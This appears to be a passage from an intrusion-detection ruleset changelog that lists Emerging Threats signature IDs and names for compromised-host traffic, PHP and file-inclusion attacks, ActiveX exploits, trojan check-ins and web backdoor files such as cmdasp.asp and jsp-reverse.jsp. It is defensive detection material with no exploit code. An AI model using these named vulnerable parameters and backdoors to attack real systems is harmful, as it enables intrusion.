        2510089 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510090 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510091 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510092 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510093 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510094 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510095 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510096 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510097 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510098 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510099 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510100 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510101 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510102 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510103 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510104 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510105 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510106 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510107 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510108 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510109 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510110 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510111 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510112 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510113 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510114 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510115 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510116 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510117 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510118 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510119 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510120 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510121 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510122 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510123 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510124 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510125 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510126 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510127 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510128 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510129 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510130 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510131 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510132 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510133 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510134 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510135 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510136 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510137 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510138 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Removed from emerging-sid-msg.map.txt (177):
        2001621 || ET Exploit Suspected PHP Injection Attack || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHP_Injection || url,doc.emergingthreats.net/2001621 || cve,2002-0953
        2001716 || ET Web IDN url seen.. || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_IDN || url,doc.emergingthreats.net/2001716
        2001810 || ET EXPLOIT WEB PHP remote file include exploit attempt || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_PHP_Injection || url,doc.emergingthreats.net/2001810
        2002035 || ET MALWARE Better Internet Spyware User Agent Activity (thin) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MALWARE_USER_Agents || url,doc.emergingthreats.net/bin/view/Main/2002035
        2002792 || ET TROJAN Win32.Agent Reporting User Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_W32Agent.dsi || url,doc.emergingthreats.net/2002792
        2002838 || ET Google Search Appliance browsing the Internet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002838 || url,www.google.com/enterprise/gsa/index.html
        2002849 || ET WEB-MISC Google Appliance External Proxy Stylesheet || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_Google || url,doc.emergingthreats.net/2002849 || cve,2005-3758 || bugtraq,15509
        2003520 || ET EXPLOIT webCalendar Remote File include || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB/WEB_WebCalendar || url,doc.emergingthreats.net/2003520 || url,www.securityfocus.com/archive/1/462957
        2003642 || ET TROJAN Downloader.Affill User Agent Detected (lol) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2003642
        2007611 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 1 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007611
        2007612 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and No Message Body - Priority 3 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007612
        2007613 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 1 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007613
        2007614 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and MAC Message Body - Priority 3 || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007614
        2007950 || ET MALWARE Possible Infection Report Mail - Indy Mail lib and Nome do Computador in Body || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Infection_Emails || url,doc.emergingthreats.net/2007950
        2008142 || ET MALWARE Vapsup User-Agent (doshowmeanad loader v2.1) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Vapsup || url,doc.emergingthreats.net/2008142
        2008189 || ET TROJAN SpamTool.Win32.Agent.gy Or Similar HTTP Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_General_Spamtools || url,doc.emergingthreats.net/2008189
        2008278 || ET MALWARE Generic Raider Obfuscated VBScript || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Raider_Obfuscated_VBS || url,doc.emergingthreats.net/2008278 || url,bbs.duba.net/viewthread.php?tid=21892104&page=1&extra=page=1
        2008379 || ET MALWARE Swizzor Checkin (kgen_up) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Lop || url,doc.emergingthreats.net/2008379
        2008505 || ET MALWARE Adaware.BarACE Checkin and Update || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_BarAce || url,doc.emergingthreats.net/2008505 || url,www.symantec.com/security_response/writeup.jsp?docid=2007-021714-2431-99&tabid=2
        2008973 || ET MALWARE onmuz.com Infection Activity || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Onmuz.com || url,doc.emergingthreats.net/2008973
        2009126 || ET Malware Possible bot C&C Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2009126
        2009156 || ET MALWARE Unknown Dropper Checkin || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Droppers_General || url,doc.emergingthreats.net/2009156 || url,www.virustotal.com/analisis/a4a854e56ecc0a54204fc3b043c63094
        2009306 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009307 || ET WEB_SPECIFIC WeBid cron.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009308 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009309 || ET WEB_SPECIFIC WeBid ST_browsers.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009310 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009311 || ET WEB_SPECIFIC WeBid ST_countries.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009312 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Local File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009313 || ET WEB_SPECIFIC WeBid ST_platforms.php include_path Parameter Remote File Inclusion || bugtraq,34074 || url,milw0rm.com/exploits/8195
        2009314 || ET WEB_ACTIVEX Orbit Downloader ActiveX Control Arbitrary File Delete || url,milw0rm.com/exploits/8257 || bugtraq,34200
        2009315 || ET WEB_ACTIVEX PrecisionID Datamatrix ActiveX control Arbitrary File Overwrite || url,securityfocus.com/archive/1/502319 || url,milw0rm.com/exploits/8332
        2009316 || ET WEB_SPECIFIC YapBB class_yapbbcooker.php cfgIncludeDirectory Parameter Remote File Inclusion || bugtraq,30686
        2009317 || ET WEB_SPECIFIC DesktopOnNet don3_requiem.php app_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
        2009318 || ET WEB_SPECIFIC DesktopOnNet frontpage.php app_path Parameter Remote File Inclusion || url,milw0rm.com/exploits/5715 || url,xforce.iss.net/xforce/xfdb/42790 || cve,2008-2649
        2009319 || ET WEB_SPECIFIC DeZine DZcms products.php pcat parameter SQL injection || url,milw0rm.com/exploits/7722 || bugtraq,33194
        2009320 || ET WEB_SPECIFIC rgboard _footer.php skin_path parameter local file inclusion || url,milw0rm.com/exploits/7978 || bugtraq,33621
        2009321 || ET WEB_SPECIFIC rgboard footer.php _path parameter remote file inclusion || url,milw0rm.com/exploits/7978 || bugtraq,33621
        2009322 || ET WEB_ACTIVEX SupportSoft DNA Editor Module ActiveX Control Insecure Method Remote Code Execution || url,milw0rm.com/exploits/8160 || bugtraq,34004
        2009323 || ET WEB_SPECIFIC Demium CMS tracking.php follow_kat Parameter SQL Injection || url,milw0rm.com/exploits/8124 || bugtraq,33933
        2009324 || ET WEB_SPECIFIC Demium CMS urheber.php name Parameter Local File Inclusion || url,milw0rm.com/exploits/8124 || bugtraq,33933
        2009325 || ET WEB_SPECIFIC phPortal gunaysoft.php icerikyolu Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009326 || ET WEB_SPECIFIC phPortal gunaysoft.php sayfaid Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009327 || ET WEB_SPECIFIC phPortal gunaysoft.php uzanti Parameter Remote File Inclusion || url,xforce.iss.net/xforce/xfdb/43569 || cve,CVE-2008-3022 || bugtraq,30064
        2009328 || ET WEB_ACTIVEX GeoVision LiveAudio ActiveX Control Remote Code Execution || url,milw0rm.com/exploits/8206 || bugtraq,34115
        2009329 || ET WEB_SPECIFIC ZABBIX locales.php srclang Parameter Local File Inclusion || bugtraq,33965 || url,milw0rm.com/exploits/8140 || url,secunia.com/advisories/34091/
        2009330 || ET WEB_SPECIFIC MyForum centre.php padmin Parameter Local File Inclusion || url,milw0rm.com/exploits/6846 || url,vupen.com/english/advisories/2008/2938
        2009331 || ET WEB_SPECIFIC tinyCMS templater.php Local File Inclusion || bugtraq,30785 || url,milw0rm.com/exploits/6287
        2009332 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
        2009333 || ET WEB_SPECIFIC ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion || url,milw0rm.com/exploits/5906 || url,secunia.com/advisories/30784/
        2009334 || ET WEB_ACTIVEX Morovia Barcode ActiveX Control Arbitrary File Overwrite || bugtraq,23934 || url,milw0rm.com/exploits/8208
        2009335 || ET WEB_SPECIFIC nicLOR CMS-School showarticle.php aID Parameter SQL Injection || url,xforce.iss.net/xforce/xfdb/46330 || url,milw0rm.com/exploits/6982 || bugtraq,32112
        2009336 || ET WEB Possible Web Backdoor cfexec.cfm access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009337 || ET WEB Possible Web Backdoor cmdasp.asp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009338 || ET WEB Possible Web Backdoor cmdasp.aspx access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009339 || ET WEB Possible Web Backdoor simple-backdoor.php access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009340 || ET WEB Possible Web Backdoor php-backdoor.php access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009341 || ET WEB Possible Web Backdoor jsp-reverse.jsp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009342 || ET WEB Possible Web Backdoor perlcmd.cgi access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009343 || ET WEB Possible Web Backdoor cmdjsp.jsp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2009344 || ET WEB Possible Web Backdoor cmd-asp-5.1.asp access || url,ddanchev.blogspot.com/2007/04/compilation-of-web-backdoors.html
        2500081 || ET COMPROMISED Known Compromised or Hostile Host Traffic (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500082 || ET COMPROMISED Known Compromised or Hostile Host Traffic (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500083 || ET COMPROMISED Known Compromised or Hostile Host Traffic (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500084 || ET COMPROMISED Known Compromised or Hostile Host Traffic (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500085 || ET COMPROMISED Known Compromised or Hostile Host Traffic (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500086 || ET COMPROMISED Known Compromised or Hostile Host Traffic (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500087 || ET COMPROMISED Known Compromised or Hostile Host Traffic (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500088 || ET COMPROMISED Known Compromised or Hostile Host Traffic (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500089 || ET COMPROMISED Known Compromised or Hostile Host Traffic (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500090 || ET COMPROMISED Known Compromised or Hostile Host Traffic (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500091 || ET COMPROMISED Known Compromised or Hostile Host Traffic (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500092 || ET COMPROMISED Known Compromised or Hostile Host Traffic (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500093 || ET COMPROMISED Known Compromised or Hostile Host Traffic (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500094 || ET COMPROMISED Known Compromised or Hostile Host Traffic (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500095 || ET COMPROMISED Known Compromised or Hostile Host Traffic (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500096 || ET COMPROMISED Known Compromised or Hostile Host Traffic (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500097 || ET COMPROMISED Known Compromised or Hostile Host Traffic (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500098 || ET COMPROMISED Known Compromised or Hostile Host Traffic (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500099 || ET COMPROMISED Known Compromised or Hostile Host Traffic (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500100 || ET COMPROMISED Known Compromised or Hostile Host Traffic (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500101 || ET COMPROMISED Known Compromised or Hostile Host Traffic (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500102 || ET COMPROMISED Known Compromised or Hostile Host Traffic (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500103 || ET COMPROMISED Known Compromised or Hostile Host Traffic (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500104 || ET COMPROMISED Known Compromised or Hostile Host Traffic (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500105 || ET COMPROMISED Known Compromised or Hostile Host Traffic (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500106 || ET COMPROMISED Known Compromised or Hostile Host Traffic (107) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500107 || ET COMPROMISED Known Compromised or Hostile Host Traffic (108) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500108 || ET COMPROMISED Known Compromised or Hostile Host Traffic (109) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500109 || ET COMPROMISED Known Compromised or Hostile Host Traffic (110) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500110 || ET COMPROMISED Known Compromised or Hostile Host Traffic (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500111 || ET COMPROMISED Known Compromised or Hostile Host Traffic (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500112 || ET COMPROMISED Known Compromised or Hostile Host Traffic (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500113 || ET COMPROMISED Known Compromised or Hostile Host Traffic (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500114 || ET COMPROMISED Known Compromised or Hostile Host Traffic (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500115 || ET COMPROMISED Known Compromised or Hostile Host Traffic (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500116 || ET COMPROMISED Known Compromised or Hostile Host Traffic (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500117 || ET COMPROMISED Known Compromised or Hostile Host Traffic (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500118 || ET COMPROMISED Known Compromised or Hostile Host Traffic (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500119 || ET COMPROMISED Known Compromised or Hostile Host Traffic (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500120 || ET COMPROMISED Known Compromised or Hostile Host Traffic (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500121 || ET COMPROMISED Known Compromised or Hostile Host Traffic (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500122 || ET COMPROMISED Known Compromised or Hostile Host Traffic (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500123 || ET COMPROMISED Known Compromised or Hostile Host Traffic (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500124 || ET COMPROMISED Known Compromised or Hostile Host Traffic (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500125 || ET COMPROMISED Known Compromised or Hostile Host Traffic (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500126 || ET COMPROMISED Known Compromised or Hostile Host Traffic (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500127 || ET COMPROMISED Known Compromised or Hostile Host Traffic (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500128 || ET COMPROMISED Known Compromised or Hostile Host Traffic (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500129 || ET COMPROMISED Known Compromised or Hostile Host Traffic (130) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500130 || ET COMPROMISED Known Compromised or Hostile Host Traffic (131) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500131 || ET COMPROMISED Known Compromised or Hostile Host Traffic (132) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500132 || ET COMPROMISED Known Compromised or Hostile Host Traffic (133) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500133 || ET COMPROMISED Known Compromised or Hostile Host Traffic (134) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500134 || ET COMPROMISED Known Compromised or Hostile Host Traffic (135) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500135 || ET COMPROMISED Known Compromised or Hostile Host Traffic (136) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500136 || ET COMPROMISED Known Compromised or Hostile Host Traffic (137) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500137 || ET COMPROMISED Known Compromised or Hostile Host Traffic (138) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500138 || ET COMPROMISED Known Compromised or Hostile Host Traffic (139) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510081 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (82) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510082 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (83) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510083 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (84) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510084 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (85) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510085 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (86) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510086 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (87) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510087 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (88) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510088 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (89) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510089 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (90) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510090 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (91) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510091 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (92) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510092 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (93) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510093 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (94) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510094 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (95) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510095 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (96) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510096 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (97) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510097 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (98) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510098 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (99) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510099 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (100) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510100 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (101) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510101 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (102) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510102 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (103) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510103 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (104) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510104 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (105) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510105 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (106) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
